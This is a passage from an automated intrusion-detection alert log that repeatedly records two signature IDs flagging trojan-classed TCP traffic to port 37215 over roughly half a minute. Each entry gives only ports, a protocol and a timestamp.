          SID:2835222
          Source Port:34468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720955
          SID:2829579
          Source Port:58024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312794
          SID:2835222
          Source Port:46112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028370
          SID:2829579
          Source Port:45506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165477
          SID:2829579
          Source Port:56910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226349
          SID:2835222
          Source Port:40400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558680
          SID:2829579
          Source Port:55754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038482
          SID:2835222
          Source Port:60256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.123247
          SID:2835222
          Source Port:42716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.671686
          SID:2829579
          Source Port:58106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596072
          SID:2835222
          Source Port:56310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915929
          SID:2829579
          Source Port:45024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.161956
          SID:2829579
          Source Port:51590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163933
          SID:2829579
          Source Port:49884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120937
          SID:2829579
          Source Port:55870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897925
          SID:2835222
          Source Port:39540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224168
          SID:2829579
          Source Port:57998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104745
          SID:2835222
          Source Port:51378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398723
          SID:2835222
          Source Port:39388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159593
          SID:2835222
          Source Port:42212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.986628
          SID:2829579
          Source Port:39758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208303
          SID:2835222
          Source Port:35420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993490
          SID:2829579
          Source Port:60184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.308877
          SID:2835222
          Source Port:36568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946808
          SID:2835222
          Source Port:44966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930079
          SID:2835222
          Source Port:60378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600492
          SID:2829579
          Source Port:35210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820119
          SID:2835222
          Source Port:57332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902357
          SID:2829579
          Source Port:42644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925293
          SID:2829579
          Source Port:56054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077959
          SID:2829579
          Source Port:42578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820349
          SID:2829579
          Source Port:45530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077171
          SID:2835222
          Source Port:53252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944584
          SID:2829579
          Source Port:45124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000868
          SID:2829579
          Source Port:32804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274858
          SID:2835222
          Source Port:40424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415541
          SID:2829579
          Source Port:47768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538370
          SID:2829579
          Source Port:55986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557430
          SID:2829579
          Source Port:49638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538531
          SID:2835222
          Source Port:37202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.681968
          SID:2829579
          Source Port:43442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643742
          SID:2835222
          Source Port:41458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985340
          SID:2835222
          Source Port:60300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224895
          SID:2835222
          Source Port:58120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.079366
          SID:2835222
          Source Port:57048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078538
          SID:2835222
          Source Port:33550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032952
          SID:2835222
          Source Port:52404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821389
          SID:2835222
          Source Port:48100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286668
          SID:2835222
          Source Port:49934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078687
          SID:2829579
          Source Port:60666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418752
          SID:2835222
          Source Port:52184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.399120
          SID:2835222
          Source Port:37904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948989
          SID:2835222
          Source Port:33488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926013
          SID:2829579
          Source Port:58368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946473
          SID:2835222
          Source Port:53860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164587
          SID:2829579
          Source Port:48854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278960
          SID:2835222
          Source Port:56886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296991
          SID:2835222
          Source Port:52928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206006
          SID:2835222
          Source Port:44674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077902
          SID:2835222
          Source Port:56450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599525
          SID:2835222
          Source Port:55536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926237
          SID:2829579
          Source Port:54100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566336
          SID:2829579
          Source Port:53930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226998
          SID:2835222
          Source Port:56448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472163
          SID:2835222
          Source Port:54934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038392
          SID:2829579
          Source Port:43324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285108
          SID:2835222
          Source Port:46834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892633
          SID:2835222
          Source Port:50940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082097
          SID:2835222
          Source Port:42132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658654
          SID:2835222
          Source Port:53446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720234
          SID:2829579
          Source Port:53818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205480
          SID:2835222
          Source Port:46962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540225
          SID:2829579
          Source Port:47706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.473353
          SID:2835222
          Source Port:44876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285109
          SID:2829579
          Source Port:44564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299377
          SID:2829579
          Source Port:44392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644360
          SID:2835222
          Source Port:35658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996582
          SID:2835222
          Source Port:39510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.003677
          SID:2829579
          Source Port:53904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719436
          SID:2835222
          Source Port:50784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163046
          SID:2829579
          Source Port:56488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651684
          SID:2829579
          Source Port:33968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164298
          SID:2835222
          Source Port:56646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033906
          SID:2829579
          Source Port:48604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299658
          SID:2835222
          Source Port:48116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226899
          SID:2829579
          Source Port:44534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.137895
          SID:2829579
          Source Port:45482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867850
          SID:2829579
          Source Port:51670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719593
          SID:2835222
          Source Port:56886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473653
          SID:2829579
          Source Port:33660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822546
          SID:2829579
          Source Port:35794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291703
          SID:2829579
          Source Port:50868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567987
          SID:2829579
          Source Port:34270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991305
          SID:2835222
          Source Port:45576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718335
          SID:2835222
          Source Port:55942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863871
          SID:2835222
          Source Port:37200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.080021
          SID:2829579
          Source Port:37728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157822
          SID:2835222
          Source Port:37568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646089
          SID:2829579
          Source Port:35094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246616
          SID:2835222
          Source Port:55596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160957
          SID:2835222
          Source Port:48412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948460
          SID:2829579
          Source Port:41444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928872
          SID:2829579
          Source Port:50660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944366
          SID:2835222
          Source Port:36188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105285
          SID:2829579
          Source Port:48842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166182
          SID:2829579
          Source Port:59228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.541561
          SID:2829579
          Source Port:39766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.553728
          SID:2835222
          Source Port:51882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102903
          SID:2829579
          Source Port:48008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165782
          SID:2835222
          Source Port:46324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599852
          SID:2829579
          Source Port:49896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601719
          SID:2829579
          Source Port:46490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658240
          SID:2835222
          Source Port:57654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076371
          SID:2835222
          Source Port:55700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397042
          SID:2835222
          Source Port:58458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158236
          SID:2835222
          Source Port:47750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287328
          SID:2835222
          Source Port:58978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490344
          SID:2835222
          Source Port:51428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028261
          SID:2835222
          Source Port:32964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562081
          SID:2835222
          Source Port:40240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082209
          SID:2829579
          Source Port:41774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034194
          SID:2835222
          Source Port:41732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288456
          SID:2835222
          Source Port:46214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298131
          SID:2835222
          Source Port:50414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251322
          SID:2835222
          Source Port:56550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.097870
          SID:2829579
          Source Port:55792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599313
          SID:2835222
          Source Port:39716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466813
          SID:2829579
          Source Port:34056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224431
          SID:2835222
          Source Port:49904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.949918
          SID:2835222
          Source Port:35254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987105
          SID:2835222
          Source Port:59804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988749
          SID:2829579
          Source Port:60854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865967
          SID:2829579
          Source Port:34034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224450
          SID:2829579
          Source Port:35082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244850
          SID:2835222
          Source Port:45268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.125242
          SID:2829579
          Source Port:58552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208225
          SID:2829579
          Source Port:51678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644688
          SID:2835222
          Source Port:42448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643656
          SID:2829579
          Source Port:60570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718082
          SID:2835222
          Source Port:39054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292812
          SID:2829579
          Source Port:60422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822693
          SID:2835222
          Source Port:51770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243878
          SID:2829579
          Source Port:36536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692001
          SID:2829579
          Source Port:43714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205778
          SID:2829579
          Source Port:45004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292535
          SID:2835222
          Source Port:50672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718620
          SID:2829579
          Source Port:47506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.992282
          SID:2835222
          Source Port:40548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417526
          SID:2835222
          Source Port:33450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.671563
          SID:2835222
          Source Port:48792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290520
          SID:2835222
          Source Port:39760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986136
          SID:2829579
          Source Port:39958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923542
          SID:2829579
          Source Port:47870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399391
          SID:2835222
          Source Port:37222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399361
          SID:2829579
          Source Port:59638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645100
          SID:2829579
          Source Port:54932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032527
          SID:2835222
          Source Port:52586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568042
          SID:2829579
          Source Port:56328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465106
          SID:2829579
          Source Port:54656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035909
          SID:2835222
          Source Port:38174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282418
          SID:2829579
          Source Port:56040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417700
          SID:2829579
          Source Port:58022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133721
          SID:2835222
          Source Port:40886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562051
          SID:2829579
          Source Port:39132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412503
          SID:2829579
          Source Port:53952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718266
          SID:2829579
          Source Port:36156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008676
          SID:2835222
          Source Port:41854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400433
          SID:2835222
          Source Port:54208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905891
          SID:2835222
          Source Port:47014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.632573
          SID:2829579
          Source Port:50452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207985
          SID:2835222
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644341
          SID:2829579
          Source Port:40838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603788
          SID:2835222
          Source Port:60328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818359
          SID:2835222
          Source Port:52814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717807
          SID:2829579
          Source Port:56040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952421
          SID:2835222
          Source Port:41578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468653
          SID:2835222
          Source Port:54926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205439
          SID:2829579
          Source Port:38460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.886943
          SID:2835222
          Source Port:36714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038826
          SID:2835222
          Source Port:49042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.134504
          SID:2829579
          Source Port:54870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225210
          SID:2835222
          Source Port:38674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032651
          SID:2829579
          Source Port:32962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033776
          SID:2835222
          Source Port:34096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035246
          SID:2829579
          Source Port:45698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398257
          SID:2835222
          Source Port:34976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560479
          SID:2829579
          Source Port:40254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225276
          SID:2829579
          Source Port:39618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081843
          SID:2829579
          Source Port:41234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036128
          SID:2835222
          Source Port:56562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284724
          SID:2835222
          Source Port:55644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947232
          SID:2829579
          Source Port:52294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865329
          SID:2829579
          Source Port:52258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.644736
          SID:2835222
          Source Port:48548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397988
          SID:2829579
          Source Port:36456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868793
          SID:2835222
          Source Port:39402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945279
          SID:2829579
          Source Port:53948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996725
          SID:2829579
          Source Port:54276
          Destination Port:37215
